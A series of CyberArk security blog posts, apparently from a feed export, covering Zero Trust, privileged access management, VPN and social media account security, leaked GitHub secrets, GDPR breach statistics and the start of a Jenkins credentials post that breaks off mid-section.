In the absence of effective barriers, the biggest weapons companies have to wield against malicious actors is information. The future of identity relies on having enough information, or “context,” to verify every user, on every device, for every login. With growing cloud adoption and more apps, users, and devices seeking access on the go, from across the globe – there’s so much now that exists beyond the traditional perimeter. Security today can’t be as binary as determining whether an access request came from within or outside of the firewall.

Winter is here, and the wall has been breached. To win the ultimate battle of good and evil, we’re going to need to regroup and rethink our approach when it comes to identity and access management.

One increasingly popular approach to cybersecurity is Zero Trust. Click here to see more on the importance of this strategy today, then tune in for our next installment of this blog series where we’ll break down the core tenets of Zero Trust, starting with how to verify every user.

 

Read the series on Zero Trust here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Q&A: Threat Analytics, Detection and Response in the Cloud https://www.cyberark.com/blog/qa-threat-analytics-detection-and-response-in-the-cloud-your-questions-answered/ Thu, 25 Apr 2019 13:00:38 +0000 https://www.cyberark.com/?p=56756

A WIRED article detailing a nation state attack recently caught my attention. The piece introduced the concept of “breakout time,” which is essentially the time it takes for a cyber attacker to go from an initial foothold to a full-fledged breach where the attacker has access to critical systems. In this particular post-breach analysis, the breakout time was only 19 minutes. Now consider that the global median “dwell time” (or duration between the start of an intrusion and detection by an internal or external source) is 78 days. That’s a difference of 77 days and 1,421 minutes in the attacker’s favor. Pretty scary stuff. The critical need to minimize this cyber attack dwell time was the driving force behind our decision to make threat analytics a central part of the CyberArk Privileged Access Security Solution.

We believe that the ability to rapidly collect, detect, alert and respond to high-risk activity and behavior is an absolute necessity in mitigating risk from an advanced attack. With the recent introduction of v10.8 of our solution, we’ve taken these capabilities to the cloud.

We recently held a webinar to help customers get a feel for these new features and enhancements. The webinar featured a lively Q&A session as attendees got a chance to virtually “kick the tires” and delve into product specifics. Here’s an abbreviated version of this discussion.  To learn more watch this video  tune into the on-demand webinar and check out this blog post.

The webinar was hosted by Scott Ward, Principal Solutions Manager for AWS Web Services, Corey O’Connor, Senior Product Marketing Manager for CyberArk and Hila Oved, Product Manager for CyberArk. During the webinar, the three fielded frequently asked questions in a question and answer session.

 Can the CyberArk solution be configured to receive data from AWS?

 Ward: Yes. It’s actually designed as a two-way integration. First, CyberArk queries the AWS environment to discover all privileged AWS users. We consider their permissions, their group memberships and assigned policies. The second integration is designed using modern event-driven architecture. Our information is fed from AWS CloudTrail using our CyberArk Lambda function, which collects this information and sends it to threat analytics. This ensures that our solution analyzes every single attempt by every single privileged user to access infrastructure using credentials such as access keys or passwords.

Can these new discovery capabilities help me identify shadow admins in my cloud environments?

Oved: Absolutely. CyberArk can automatically identify all privileged accounts within AWS, such as unmanaged EC2 instances and accounts, as well as identity and access management (IAM) users. This includes shadow admins, or accounts that have privileged access but are not members of a privileged Active Directory, making them easy to overlook. Our new discovery capability enables the tracking of AWS credentials everywhere that they’re created, as they’re created, which speeds up the onboarding process for these unmanaged accounts. Additionally, the CyberArk integration with the AWS Security Hub gives AWS customers enhanced visibility around all privileged credentials tied to their AWS accounts as well as deeper, data-driven insights and enhanced detection capabilities to help them break the attack lifecycle quickly.

 Q: Can CyberArk’s advanced threat analytics capabilities be included in an on-premises deployment?

 O’Connor: Yes! It can be installed on-premises. From there, AWS becomes an additional sensor that feeds information to CyberArk.  Alternatively, the solution can be deployed directly in the cloud. By streamlining deployment and using Amazon’s AMIs for all core components – from vaulting to privileged session management to threat analytics – organizations can be up and running with the CyberArk solution in about 10 minutes.

In closing, I’d like to share a story I recently read in the The Register. A disgruntled, recently laid-off ex-employee of a large enterprise stole a colleague’s AWS login credentials, targeted 23 different servers and took down all of his former employer’s AWS instances. With the stolen privileged credentials, the ex-employee easily logged in, changed the passwords, terminated the servers and logged out – completely undetected. The company suffered a loss of over £500,000 of business-critical data. Additionally, it lost many large customers and contracts and even resorted to another round of layoffs to recover damages.

It’s clear from this story just how costly a poor security posture (and corresponding poor cybersecurity hygiene) can be. Cloud security needs to be a shared responsibility between a cloud vendor and customer organization. This shared responsibility model is one of the many reasons for our long-term strategic partnership with AWS. If you are interested in learning more about how CyberArk can help you secure your native AWS, hybrid, multi-cloud and DevOps environments, check out this on-demand webinar, visit our AWS integration page or get in touch with us directly.

]]>
ArkCon 2019 Welcomes Top Researchers with a Cybersecurity Challenge https://www.cyberark.com/blog/arkcon-2019-welcomes-top-researchers-with-a-cybersecurity-challenge/ Tue, 23 Apr 2019 13:00:48 +0000 https://www.cyberark.com/?p=56520

ArkCon 2019 is just around the corner. CyberArk Labs is hosting its event for top cybersecurity researchers in Tel Aviv, Israel on April 29. CyberArk Labs issued challenges to the cybersecurity community that only the best of the best could solve. Now, those who answered one or more cybersecurity challenge – and other top cybersecurity researchers – are meeting to attend sessions and collaborate with their peers. This year’s guest speaker goes by pancake (with a small “p”), creator of the popular, free and open source reverse engineering platform radare2.

I spoke with Doron Naim, CyberArk Lab’s Group Manager and the event’s organizer, about what he has planned for the upcoming conference and why it’s going to be bigger and better than ever.

What do you hope attendees will learn at ArkCon?

Naim: We’re hosting three speakers this year at ArkCon. “pancake” – our keynote speaker from Spain – is going to share the new feature in radare2 (an open source tool he wrote) – a free reverse engineering platform. The second speaker is Eyal Itkin, a security researcher from CheckPoint, who will share his insights into RDP protocol and how he discovered related vulnerabilities. Nimrod Stoler, a security researcher from CyberArk, will talk about research he’s conducted on container security.

In addition to the speakers, one of the most important benefits of attending this event is the level of knowledge sharing and collaboration – so there will be plenty of quality networking opportunities.

What are you most proud of about this year’s ArkCon?

Naim: This year’s ArkCon is going to be much more than a standard cyber event. First, the audience is highly professional, the very best people in the field. Second, ArkCon is going to have lots of exciting ways for attendees to participate and engage.   During the conference, attendees can compete for prizes by solving each cybersecurity challenge. There will be plenty of space for interactive games, food and networking. The goal is to encourage healthy competition and help people to get to know each other. That way, we boost the networking level and make the conference a fun, rewarding place to be.

What are you most excited to do at this year’s ArkCon? What are you most looking forward to?

Naim: Meeting the challenge solvers. Two weeks before the event, we opened up challenges for the interested individuals to take. Each cybsecurity challenge was written by different people with different skills. Every challenge comes from a different aspect of the cyber security field. The ones who solved most of them are experts in their field and will be presented with prizes on the stage at the end of the conference.

What are the biggest opportunities ArkCon presents?

Naim: Free of charge education and networking. ArkCon gathers a distinct audience of highly skilled people who can contribute a lot to the market. ArkCon provides them with the platform to meet face-to-face and share their experience and insights. ArkCon does all this and more.

How will this year’s ArkCon be different from last year’s?

Naim: ArkCon this year is going to be four times bigger than the previous one. Last year’s ArkCon we hosted at the Israeli CyberArk offices. There was a room for very limited number of guests, so we decided to initiate a cybersecurity challenge and only give tickets to the people who solved it. This year is different. Guests can register freely, so solving the challenges is now all about the prestige. The Hall of Fame for our top cybersecurity challenge-solvers can be found here.

A lot of people put a lot of time into solving (or failing to solve) your challenges. What went into creating your challenges?

Naim: We got really good feedback. Hundreds of people are trying to solve the challenges every day. Each cybersecurity challenge is very different from all the others – which makes them harder and more interesting than the traditional Capture the Flags [a type of information security competition.] More than 100 people have already solved one or more of the challenges. We’ve found our winners, but we’re keeping that a secret until the conference. We’ll announce the winners then.

If you’re interested in learning more about ArkCon 2019, visit the webpage, register for the conference or keep up-to-date by following @ArkC0n on Twitter as well as following the event on Instagram and Facebook.

]]>
New Gartner Report Made Available by CyberArk: Best Practices for Privileged Access Management Through the Four Pillars of PAM https://www.cyberark.com/blog/new-gartner-report-made-available-by-cyberark-best-practices-for-privileged-access-management-through-the-four-pillars-of-pam/ Thu, 18 Apr 2019 13:00:33 +0000 https://www.cyberark.com/?p=52493

Security and risk management leaders recognize that disruption begins with privileged access, since it allows external attackers and malicious insiders to control organization resources, disable security systems and access vast amounts of sensitive data. Yet, as organizations increasingly adopt cloud-first strategies and implement DevOps methodologies, many are struggling to protect the widening attack surface, efficiently balance security and productivity and effectively address Privileged Access Management (PAM) risk.

Whether you are just getting started or planning more advanced PAM strategies to accelerate digital transformation, we believe Gartner’s new report, “Best Practices for Privileged Access Management Through the Four Pillars of PAM,”1 can serve as a valuable guide. In the report, Gartner outlines key challenges and makes recommendations that security and risk management leaders responsible for identity and access management should consider, including:

 Track and secure every privileged account. Gartner states that “The discovery of privileged accounts is fundamentally important, because the existence of any unaccounted privileged access, for even a short time, carries significant risk.” Gartner further notes that “Privileged accounts used by people to log in interactively to software and devices for privileged task execution include: personal, privileged accounts, shared, privileged accounts, built-in, administrative accounts, such as local administrator and root, and privileged account used by software include: application-to-application credentials, service accounts, and credentials that can be embedded in code and stored procedures.”

 Govern and control access. According to Gartner, “privileged access governance, understanding and implementing appropriate PAM access, requires two things: effective identity life cycle processes to ensure that all changes in accounts with privileged access  are accounted for and proper tracking, accounting for every privileged account and what that account can access.” After mastering these, organizations can evaluate and install PAM tools to implement controls, such as granting Just in Time access across a set of privileged accounts as part of a phased approach.

Record and audit privileged activity. Gartner encourages organizations to use the following recommendation to define and implement your approach to recording, auditing, and alerting: “Notable PAM activity that should generate alerts includes failed login attempts for privileged accounts; privileged access that bypasses PAM tools; and unusual access activities, such as abnormal times or places.”

Operationalize privileged tasks. Organizations that have already invested in PAM should look for opportunities to extend the value of their tools to accelerate digital transformation initiatives – from DevOps to robotic process automation. Gartner recommends “good targets for automation are predictable and repeatable tasks, such as simple configuration changes, software installations, service restarts, log management, startup and shutdown.”

For an in-depth look at these recommendations, download a complimentary copy of the Gartner report.

Top 10 Security Projects for Security and Risk Management Organizations

According to Gartner, “by 2022, 90 percent of organizations will recognize that mitigation of PAM risk is a fundamental security control, which is an increase from 70 percent today.”* Is PAM a top security priority for your organization?

In our on-demand webinar, “Top 10 Security Projects for Security and Risk Management Organizations,” featured presenter Gartner VP and Distinguished Analyst Neil MacDonald outlines a risk-prioritized approach that places an emphasis on technology projects that maximize risk reduction for the resources required to deploy them. Register here to explore five of Gartner’s top security recommendations – including PAM.

 

1Gartner. “Best Practices for Privileged Access Management Through the Four Pillars of PAM.” Michael Kelley, Felix Gaehtgens. 28 January 2019.

]]>
These VPN Configurations Could Be Your Weak Spot https://www.cyberark.com/blog/these-vpn-configurations-could-be-your-weak-spot/ Wed, 17 Apr 2019 18:42:55 +0000 https://www.cyberark.com/?p=105925 Using virtual private network (VPN) client certificates and authentication cookies can help increase VPN security and improve the user experience by reducing the need to enter or re-enter a password. However, the use of these authentication methods can be like leaving your keys in the front door.

Malicious cyber attackers may hack a client computer and use its VPN client certificate or authentication cookie, or use the poorly secured session cookies on another machine, to bypass password authentication. Web-based or SSL VPN may also have certificate bypass vulnerabilities. When the key is already in the door, who needs to steal the password?

Take these steps to help ensure your VPN is not a security weak spot:

1. Secure the remote client computer by installing and enabling on the workstation:

  • A firewall
  • Anti-malware
  • An anti-theft or MDM/EMM solution. CyberArk Idaptive’s Device Security Management can remotely wipe stolen Windows 10, MacOS, iOS and Android devices.
  • Enforce device security policies that fit your organization, such as screen lock when idle, block the USB ports, and other OS hardening settings.
  • Multi-Factor Authentication for computer login. CyberArk Idaptive’s Multi-Factor Authentication for Login can offer different two-factor choices such as phone call, SMS, push notification mobile app, security question, email and OATH OTP. We also offer offline two-factor authentication when internet is not available.

2. Make sure VPN session time-outs are not too long.

3. Promptly address known vulnerabilities in your VPN solution. Keep your VPN solution up-to-date or, in some cases, downgrade to work around a bug.

4. Integrate an MFA solution with your VPN solution. In the event the VPN client certificate or session cookie is used to bypass authentication, or the user’s password has been compromised, hackers will still be prompted for multi-factor authentication as the last line of defense. CyberArk Idaptive’s MFA for VPN can integrate with both VPN thick clients and web-based VPN.

This video demonstrates two-factor authentication being prompted even when a VPN authentication cookie is being used.

Using VPN client certificates and authentication cookies has security benefits, but it also creates vulnerabilities that allow cyber attackers to bypass authentication. To help secure these vulnerabilities, secure the VPN client devices from being exploited and enforce MFA on your VPN in the event certificate, cookies or passwords are compromised.

]]>
Privileged Account Management Best Practices for Social Media Security https://www.cyberark.com/blog/privileged-account-management-best-practices-for-social-media-security/ Tue, 16 Apr 2019 13:00:20 +0000 https://www.cyberark.com/?p=51424

Social media plays a vital role in an enterprise’s marketing strategy, helping to build brand awareness, provide real-time customer support and launch new products faster than ever before. Social media has also emerged as a critical tool for governments – from individual politicians and elected officials to official accounts of government agencies and organizations – to communicate with citizens. Yet, while social media allows for the rapid dissemination of information, it has a dark side — which makes strong social media security a neccessity.

Examples and consequences of social media security breaches

Using methods such as dictionary attacks, social engineering and phishing, motivated cyber attackers target and steal social media account credentials, using them to hijack corporate and government accounts. Such account takeovers can lead to the unauthorized publishing of malicious content, confidential information and personal data. Social media attacks can lead to reputational damage, compliance violations, identity theft, loss of customer trust and significant financial implications.

For example, in 2018, residents of Hawaii and Japan received a frightening alert indicating that a ballistic missile was heading to the islands and warning people to take shelter. It look 38 minutes for the false alarm to be retracted, during which time residents took to social networks – particularly Twitter – in a panic about their personal safety. A year prior, amidst diplomatic controversy between Turkey, Germany and the Netherlands, a common Twitter tool enabled cyber attackers to hijack many high-profile organization and individual user accounts and tweet offensive propaganda from them. Previously, a group of hackers hijacked the Twitter and YouTube accounts of the US military’s Central Command and posted a series of threatening messages, propaganda videos and military documents. Around the same time, a single unauthorized tweet on the Associated Press’ Twitter account (which has more than 13 million followers) caused the stock market to plummet by $136.5 billion within minutes.

 These examples provide a glimpse of how, without effective social media security, external cyber attackers can use social media accounts to spread chaos. But, significant damage can also come from insider threats –people who have, or once had, authorized access to an organization’s social media accounts. This happened to a UK-based music and film retailer. After a large layoff, an ex-employee (and former corporate social media manager) commandeered the company’s Twitter account and posted a defamatory tweet before her social media credentials were revoked.

The overlooked threat: Shared privileged accounts for social media platforms

A typical enterprise organization has multiple (sometimes hundreds of) corporate social media accounts –Twitter, Facebook, Instagram, YouTube, LinkedIn and other outlets, each with their own unique accounts for different product lines, languages, countries and stakeholders. Typically, multiple people manage and access each of these accounts on a regular basis.

To simplify workflows across channels, users, office locations and time zones, these social media accounts are typically set up as shared privileged accounts. Passwords are often shared across teams and even third-party contractors, and are rarely (if ever) changed, making them easy targets for external attackers and malicious insiders.

Since social media credentials are typically deemed “low risk” because they don’t enable access to sensitive financial or customer data, security is typically lax, with no record or accountability for who is responsible for each post. Worse still, many companies have no idea who actually has access to their social media accounts and passwords at any given moment.

 Six ways to mitigate the risk of social media cyber attacks with privileged access management

To properly secure and protect social media accounts from security threats and cyber attacks, they should be viewed as privileged accounts and best practices for privileged access management must be implemented to mitigate the risk of compromise. These include:

  1. Securely store credentials. Improve social media security by protecting social media account credentials from account takeovers by storing passwords in a centralized, secure digital vault. This reduces the ability of an attacker or malicious insider to take control over the social media accounts.
  2. Enable transparent access. Allow authorized users to connect directly to various social media platforms, enabling them to authenticate to accounts without knowing the actual passwords. This makes it difficult for attackers to discover and steal privileged credentials while balancing security and operational requirements.
  3. Eliminate shared credentials. Storing passwords in a digital vault requires users to login individually for access, eliminating the accountability challenges of shared credentials. Additionally, creating policy around which users can access which social media accounts mitigates the risk of credential-based cyber attacks.
  4. Automate and enforce password changes. Ensure that each password is changed on a regular basis (as frequently as every use). This reduces the chance of an outsider stealing and using a valid credential to wreak havoc.
  5. Trace account activity. Create a record of activity on social media accounts to trace all posts directly back to individual authorized users. This helps identify weak areas of security as well as rogue employees who may be posting damaging content. Furthermore, recording social media account sessions provides further proof for an audit trail of exactly who did what within each individual account.
  6. Assign risk scoring to sessions. Pre-defining high-risk activities within social media sessions enables automated alerting of security operations teams so that they can quickly assess the situation and take necessary action. This also helps prioritize the audit and review of social media sessions based on risk.

The threat to social media is very real and the risks are increasing. It’s time to protect your social media accounts from takeovers. The CyberArk Privileged Access Security Solution can play a critical role in protecting access to social media networks, preventing embarrassing incidents and stopping cyber attacks before irreversible damage can be done to your business. Learn more by downloading our solution brief.

]]>
GitHub Repositories Leak Thousands of Secrets, Study Shows https://www.cyberark.com/blog/github-repositories-leak-thousands-of-secrets-study-shows/ Thu, 11 Apr 2019 13:00:09 +0000 https://www.cyberark.com/?p=49657

In case you were ever in doubt about how well users are protecting credentials in GitHub repositories and other code repositories, researchers at North Carolina State University recently discovered many thousands of leaked secrets and credentials.

I spoke with CyberArk Lab’s Security Research Team Lead Lavi Lazarovitz (@__Curi05ity__) to get a better understanding of how serious this situation is, who it will affect and whether we’re looking at the beginning of a larger trend. But, first some background:

The North Carolina State University researchers Michael Meli, Matthew McNeice and Bradley Reaves  scanned billions of GitHub files as part of an  academic study that found that over 100,000 of the service’s code repositories contain exposed authentication secrets, such as cryptographic keys and API tokens, and thousands more repositories are leaking new, unique secrets every day. Researchers scanned nearly 13% of GitHub’s public repositories to collect this information.

The researchers used two approaches to identify leaked secrets. The first method was querying a GitHub repository search engine for a period of almost six months. According to the paper, this was a means of discovering in real-time 99% of newly committed files containing secrets. The second method used BiqQuery – a web service for analyzing massive datasets – to query a weekly snapshot of GitHub activity, which is what provided the researchers with their scan of 13% of Github’s public repositories.

In their scan, the researchers found 85,311 unique Google API keys, 37,781 unique RSA Private Keys and 47,814 unique Google OAuth IDs. The researchers also estimated that of the secrets enabled access to sensitive systems or data and their exposure caused real risk.

How serious a problem is this?

Lazarovitz: It clearly highlights a huge and very real problem. While the researchers didn’t release the names of specific organizations with exposed secrets, they did share that they were dealing with some large, prominent organizations. This included AWS credentials for a site used by millions of college applicants in the U.S. and AWS secrets for a major government agency in a Western European country.

The other significant finding from the study was that 81% of the secrets discovered took two weeks or longer to be removed. This means that, the developers using these sensitive secrets probably weren’t aware that their secrets were exposed or drastically underestimate the risk this poses. Furthermore, even developers who were aware of the exposed keys and the need to keep them safe might delete the key, but fail to wipe the entire GitHub repository. In this case, the keys could still be found in the GitHub repository’s commit history, which holds changes made to the GitHub repository – including deleted keys.

Why are secrets and credentials exposed in GitHub and leaked? What are the repercussions of GitHub repositories leaking secrets?

Lazarovitz: Developers write code and scripts which become part of the build or manage the build. The code and scripts typically need secrets and other credentials to do their work interacting with other applications, with other tool chains in the CI/CD pipeline, accessing cloud resources and so on.  The code and scripts are, of course, version controlled and stored in code repositories. DevOps processes require speed and agility, which effectively makes GitHub repositories and other code repositories an essential part of the CI/CD pipeline. But, that’s not the problem; the problem is there is very little security or oversight for how these credentials are managed or protected. It’s too easy for developers to hardcode credentials and, once the code is marked public, the organization’s cloud access keys are now in the public domain. An easy mistake for a developer to make when their primary focus is getting the next new feature out to customers.

What do you recommend GitHub users do to keep their keys secure? What behaviors and technologies are necessary to use GitHub responsibly?

Lazarovitz: There are some easy fixes, and many organizations do seem to be proactive. First and foremost, I’d strongly recommend never embedding credentials in code. Hardcoding secrets and credentials in code is a terrible business practice and the easiest thing to mitigate. Hardcoded credentials are one of the most common ways for credentials to leak to a repo. Instead secure and manage credentials in a vault and use API calls or other mechanisms to securely use them.  Ideally secrets would never be exposed in an application.  Other important controls to limit the privileged attack surface include changing or managing credentials on a regular basis or after use or using short lived or temporary tokens that are valid for a limited time. There are many valid approaches to take control.

Is this an example of a larger problem or trend? Is this kind of thing something we should expect to see more of?

Lazarovitz: As more and more organizations turn to using external services, repositories and resources whether part of their digital transformation or as cloud native, we should, unfortunately, expect the credential leakage to grow. Basically, if credentials are hardcoded, the cost of a misconfigured code repository, build pipeline or other tool in the tool chain is exposed IP and credentials, so every organization that is migrating code or apps using a GitHub repository or other code repository, DevOps or similar processes adds to the probability that credentials will leak.

What can attackers who get their hands on these keys do with them? What are they most likely to do with them?

Lazarovitz: Public repos are available to the whole world and don’t require great skill to scrape – hacking tools are readily available for attackers to put to misuse. And they do – attackers regularly troll GitHub, for example, for cloud access keys and other easily monetized credentials. They can also look at the history of code commits to find exposed credentials. The first attackers to find unprotected credentials are mostly opportunistic attackers that use the cloud access keys to take over compute resources to run crypto miners for immediate profit. In other cases, the attackers might sell the data or encrypt the data and ask for ransom.

What are your key takeaways? Should organizations avoid code repositories?

Lazarovitz: Of course not, Github repositories and code repositories, whether private or public, are an essential part of application development process. Instead, organization’s need to establish processes and approaches to avoid hardcoding credentials in the first place or even storing credentials on GitHub. Basically, as the research highlights, organizations and individuals are, for whatever reason exposing, potentially valuable credentials to the public and to attackers. Please don’t, as many organizations have found that it does not end well.

To learn more about CyberArk Labs research, visit the Threat Research Blog.

]]>
CyberArk Named a 5-Star Security Vendor in 2019 CRN Partner Program Guide https://www.cyberark.com/blog/cyberark-named-a-5-star-security-vendor-in-2019-crn-partner-program-guide/ Wed, 10 Apr 2019 13:00:26 +0000 https://www.cyberark.com/?p=49401

CyberArk is honored to be named a 5-Star Security Vendor – the highest rating in CRN’s 2019 Partner Program Guide. This marks the second consecutive year that CyberArk has received this prestigious designation. This recognition highlights the importance of privileged access management (PAM) as a top security control and enterprise priority. Organizations that are extending PAM to users and applications across the enterprise, in the cloud, throughout the DevOps pipeline and at the endpoint are realizing rapid risk reduction and strong business impact.

CyberArk received a 5-Star rating based on an in-depth assessment of channel program offerings, partner profitability, partner training, education and support, marketing programs and resources, sales support and communication.

CyberArk has built a powerful channel partner community to help customers around the world to reduce risk, protect against advanced cyber threats and securely embrace digital transformation strategies. This recognition comes on the heels of CyberArk’s Scott Whitehouse being named a CRN Channel Chief.

We believe that protecting high-value assets and data in today’s increasingly complex business environment requires high levels of innovation and collaboration. Our partner ecosystem brings together the strengths of advisory consultants, global systems integrators and regional solutions providers to deliver the industry’s most complete privileged access management solution. We’re honored to be recognized by CRN for our commitment to cybersecurity innovation and channel partner empowerment.

CRN’s annual guide identifies the strongest and most successful partner programs offered by the top IT products and services suppliers. Solution providers have come to rely on this world-class guide as they evaluate security providers they work with or are considering working with in the future. The 5-Star rating recognizes an elite subset of companies that empower solution providers with the best partner program offerings.

The 2019 Partner Program Guide will be featured in the April issue of CRN and is available online here. To learn more about the CyberArk Global Partner Program, visit here.

]]>
Google Cloud Identity and CyberArk: Supercharging BeyondCorp https://www.cyberark.com/blog/google-cloud-identity-and-cyberark-supercharging-beyondcorp/ Tue, 09 Apr 2019 13:00:30 +0000 https://www.cyberark.com/?p=49366

Today’s workplace is transforming rapidly. With the rise of BYOD for business and cloud services for work, user expectations are changing dramatically. As a result, enterprises are shifting core productivity apps and data to the cloud to create a more connected and collaborative work environment.

In this cloud-first era, access is no longer limited to an organization’s office or employees. Customers, third-party vendors, remote employees and partners must all be able to access data and applications in real time to keep business moving. But, this means that organizations must shift away from a perimeter or firewall-based security approach to access policies based on device information, device health and the associated user.

Google Cloud Identity from Google Cloud provides enterprises with a simple, secure and reliable way to protect user accounts and centrally manage access to apps from virtually any device, anywhere. The platform brings Google’s BeyondCorp model – a zero-trust security framework that requires every request to data or applications to be encrypted, authenticated and authorized – to organizations everywhere.

Today, we are thrilled to share that the CyberArk Privileged Access Security Solution now integrates with Google Cloud Identity, providing organizations with strong cybersecurity for the new “identity perimeter.” The integrated solution uses intelligent, unobtrusive security to ensure that only authorized, privileged users can access sensitive data and accounts – without negatively impacting user experiences.

By integrating the CyberArk solution into Google Cloud Identity, organizations have a single pane of glass for visibility and unified administration of privileged users, applications and devices. The CyberArk solution enables organizations to efficiently manage privileged accounts, credentials and access rights, while proactively monitoring and controlling privileged access activity. Through a SAML integration, Google Cloud Identity’s strong multi-factor authentication (MFA) and security key support (including the Titan Security Key)  provide adaptive, strong authentication and easy single sign-on (SSO) across all CyberArk applications by enforcing policies based on device, user and contextual attributes. This integral security layer helps organizations reduce identity sprawl by restricting access to services, while ensuring only authorized privileged users can access their accounts.

With CyberArk integrated with Google Cloud Identity, organizations can manage user lifecycles and devices, enable SSO to thousands of apps, automatically provision and de-provision accounts in SaaS apps – including G Suite and Salesforce – connect to an on-premises directory and view actionable reports. The solution is a win-win for both end-users, who can easily access work apps and files on their favorite devices, and IT security teams, who can tackle the identity management and privileged access management needs of their entire organization at scale, with ease.

To learn more and access the Google Cloud Identity and CyberArk integration, visit the CyberArk Marketplace. And to explore CyberArk’s comprehensive cloud security offerings, visit here.

 

 

 

]]>
GDPR Breach Notification By Country: 59,000 Incidents Reported https://www.cyberark.com/blog/gdpr-breach-notification-by-country-59000-incidents-reported/ Thu, 04 Apr 2019 16:10:22 +0000 https://www.cyberark.com/?p=46713 GDPR breach notification distribution

In May, it will be a year since the enforcement of the EU GDPR began. In the midst of continued and ever growing confusion within the EU caused by the Brexit process, a recent report around another high profile EU issue may have gone unnoticed. DLA Piper recently released a paper looking into incidents reported — both GDPR breach notification and other kinds of notification — fines enforced and how reports and fines are spread out across EU members.

From the time GDPR was introduced to the point when the report was released, 59,000 incidents were reported to the various regional “Data Commissioners,” such as the CNIL in France. The numbers were built upon on data reported by EU members (which still includes the UK as I write this) and collected by DLA, but, it is important to note that not all countries expose such information.

Firstly, before discussing these numbers, we need to be clear that these incidents do not imply 59,000 data breaches. Because GDPR is concerned not only with data breaches, but also with the inappropriate handling and processing of data,EU countries are required to engage in more than just GDPR data breach notification.  The reported number of incidents, therefore, cover data abuse as well as data loss, whether accidental or maliciously derived. A separate source, directly from the EU commission, places the data breach related incidents as coming to 41,500 for both malicious and accidental events.

The effects and legalities of GDPR are still rippling their way through data processing services. As a recent example, lobbyists from several countries launched a petition to their respective regional Data Protection Authorities on how EU personal data is used in the fast growing space of Real-Time Bidding, which is the process that determines which adverts are shown to you online. Real-Time Bidding is driven by the data advert companies have about you, since this is what allows them to make the most informed decision as to which advertisement you would find most appealing. The decision of which advert to show you is made in a split second and, therefore, clearly, there is no possible way for the user to ‘opt-in’ to the processing of their data. This is separate from the 50m EURO fine placed on Google by the French CNIL earlier this year.

One very interesting element of the DLA Piper report is the breakdown by country of the number of incidents filed. The Netherlands tops the list with around 15,400 reported incidents. Strangely, despite having a population nearly three times that of the Netherlands and a similar difference of scale in GDP, France only reported 1,300 incidents – over 14,000 less! This, perhaps, highlights an inconsistency between EU members as to what needs to be reported. For example, reported incidents have included simple notification that an email was accidentally sent to the wrong recipient. It would appear, although not confirmed, that the Dutch are playing it safe and reporting any infringement, whereas the French and Italians (with 610 incidents reported in Italy), have a narrower interpretation of what a data incident is.

Potentially, the reporting of even mild infringements could explain why only 91 fines have resulted from the 59,000 reported incidents. However, the report from DLA Piper does concede that there is likely to be a backlog within the EU commission to process GDPR breach notification and other types of incidents, which could mean that more fines will be forthcoming. The backlog may also be a sign that the EU underestimated the initial volume of incidents it would receive.

The main thing that is evident from this report is that the effect of the GDPR is still not fully understood. This is reflected by the huge variance in reported incidents per country and the ongoing arguments around the interpretation of legal data processing. The implications and interpretations will continue to play out for the foreseeable future.

One thing remains clear, organisations (with a deliberate UK spelling) who are the controller or processor of EU related data need to protect this information and its usage with a specific mind-set. The data is not theirs; it belongs to the individuals to whom it is linked. Organisations must treat the data as something they are borrowing or looking after, not something they own. It needs to be locked away with the right protection to ensure only those who should use it or see it can do so. It may seem like an obvious shift of perception, but it’s vital in terms of the importance we place upon protecting EU-related data.

 

]]>
Jenkins Credentials Management: Red vs. Blue https://www.cyberark.com/blog/red-vs-blue-best-practices-for-jenkins-credentials-management/ Tue, 02 Apr 2019 14:12:37 +0000 https://www.cyberark.com/?p=41900 Red vs. Blue: Jenkins Credentials Management

Red vs. Blue: Best Practices for Jenkins Credentials Management

Over the past year, CyberArk Labs has conducted extensive research on Jenkins – an open source automation server used to accelerate the software delivery process. With more than 223,000 active installations worldwide, Jenkins is considered the de facto standard in open source continuous integration tools, effectively acting as the DevOps engine, or “butler,” and addressing everything from source code management to delivering code to production. Because of this, it’s no surprise that Jenkins needs unconstrained access to privileged credentials – or secrets – to do its job. These secrets are prime targets for cyber attackers. If exploited, secrets may allow attackers to take full control of an organization’s IT infrastructure, disable security controls, steal confidential information, commit financial fraud and disrupt operations.

Our goal with this Jenkins research was to educate organizations on potential security risks around unmanaged secrets and misconfigured environments, and share best practices for protecting privileged access while maintaining DevOps velocity. In our recent webinar, Red vs. Blue: Best Practices for Jenkins Credentials Management, we showcased research highlights and demonstrated several common attack techniques using Red and Blue Team tactics, including the ones below. For an in-depth look, tune in to the on-demand webinar.

External Attackers

  • Red Team: Last February, reports emerged that attackers had successfully exploited an unpatched Jenkins vulnerability, stealthily mined Monero coins for about 18 months, and ultimately made $3 million in one of the biggest malicious cryptocurrency mining operations of all time.
  • Blue Team: To protect against outsider threats, such as crypto mining attacks, organizations must treat their Jenkins master as a fortress –constantly protecting, monitoring and auditing it. Further, staying on top of regular patches for Jenkins software and plugins is a must. While this cybersecurity hygiene practice should be table stakes, thousands of Jenkins installations have not yet been patched, meaning the software remains vulnerable.

Malicious Insiders: The Jenkins Admin

  • Red Team: Jenkins secrets are protected by encryption and may not be exposed. Same goes for Jenkins API tokens and other credentials stored in Jenkins. But can Jenkins keep its secrets from its admin? Unfortunately, the answer is no. Red Teamers will quickly discover that Jenkins admins have access to all of this critical information. Using the Script Console, admins can run code on any machine controlled by Jenkins – including the Jenkins master – to decrypt secrets and display them in clear text.
